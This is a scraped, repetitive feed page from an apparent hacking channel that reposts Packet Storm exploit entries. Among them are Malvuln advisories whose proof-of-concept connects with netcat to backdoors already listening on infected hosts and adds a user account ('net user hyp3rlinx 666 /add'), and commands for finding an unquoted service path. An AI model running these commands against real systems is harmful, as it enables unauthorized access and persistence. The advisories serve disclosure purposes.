Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Breaking the HTB Habits and building better OSCP ones…
https://cdn-images-1.medium.com/max/888/1*EzCEP64iU3HcC8FE33t51w.png
Born2Root pseudo writeup.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Breaking the HTB Habits and building better OSCP ones…
https://cdn-images-1.medium.com/max/888/1*EzCEP64iU3HcC8FE33t51w.png
Born2Root pseudo writeup.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Breaking the HTB Habits and building better OSCP ones…
Born2Root pseudo writeup.
How to write a good and acceptable report :)
Many people have been asking me this question on twitter about report writing…documentation is very crucial part in any security…Continue reading on Medium »
Read more...
Many people have been asking me this question on twitter about report writing…documentation is very crucial part in any security…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Optix.03.b Code Execution
https://4.bp.blogspot.com/-SxgEc7szt9w/WWlva1nZfUI/AAAAAAAAIPE/UrvwYC_4YmMlGypxS9ASHy318XWSifzEQCLcBGAs/s1600/h71.png
Backdoor.Win32.Optix.03.b malware suffers from a code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Optix.03.b Code Execution
https://4.bp.blogspot.com/-SxgEc7szt9w/WWlva1nZfUI/AAAAAAAAIPE/UrvwYC_4YmMlGypxS9ASHy318XWSifzEQCLcBGAs/s1600/h71.png
Backdoor.Win32.Optix.03.b malware suffers from a code execution vulnerability.
MD5 |
ec0ad87b811b4af2615050c1516aed8cDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/4cf1f1d740d7acea4d3836228980ebcb.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Optix.03.b
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 333. Third-party attackers who can reach the system can execute commands made available by the malware.
Type: PE32
MD5: 4cf1f1d740d7acea4d3836228980ebcb
Vuln ID: MVID-2021-0387
Disclosure: 11/04/2021
Exploit/PoC:
nc64.exe x.x.x.x 333
GetVicName;
GetVicName;paltalk
GetSysDir;
TheSysDir;
;C:\WINDOWS\system32\
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Optix.03.b Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass
___________________________
@hacking_Attack
@Hacking_Video
Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
PHP Event Calendar Lite Edition SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
PHP Event Calendar Lite Edition SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
PHP Event Calendar Lite Edition SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
10-Strike Network Inventory Explorer Pro 9.31 Unquoted Service Path
https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
10-Strike Network Inventory Explorer Pro version 9.31 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
10-Strike Network Inventory Explorer Pro 9.31 Unquoted Service Path
https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
10-Strike Network Inventory Explorer Pro version 9.31 suffers from an unquoted service path vulnerability.
MD5 |
e8d8bc152ee1695d56dcc64d6ce311e0Download
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
srvInventoryWebServer srvInventoryWebServer C:\Program Files
(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: srvInventoryWebServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network
Inventory Explorer Pro\InventoryWebServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : srvInventoryWebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
10-Strike Network Inventory Explorer Pro 9.31 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Ncx.b Code Execution
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
Backdoor.Win32.Ncx.b malware suffers from a code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Ncx.b Code Execution
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
Backdoor.Win32.Ncx.b malware suffers from a code execution vulnerability.
MD5 |
9b9d6bf68f20e8ef62be925ad9ea55b5Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/885e74a43b4f7caec3cfb4dba0787de4_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Ncx.b
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can execute OS commands further compromising the host.
Type: PE32
MD5: 885e74a43b4f7caec3cfb4dba0787de4
Vuln ID: MVID-2021-0389
Disclosure: 11/04/2021
Exploit/PoC:
nc64.exe x.x.x.x 99
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Victim\Desktop>whoami
whoami
desktop-2c3iqho\victim
C:\Users\Victim\Desktop>net user hyp3rlinx 666 /add
net user hyp3rlinx 666 /add
The command completed successfully.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Ncx.b Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Payment Terminal 2.x / 3.x Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Payment Terminal 2.x / 3.x Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Payment Terminal 2.x / 3.x Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Jokerdoor Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Jokerdoor Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Jokerdoor Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
___________________________
@hacking_Attack
@Hacking_Video
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.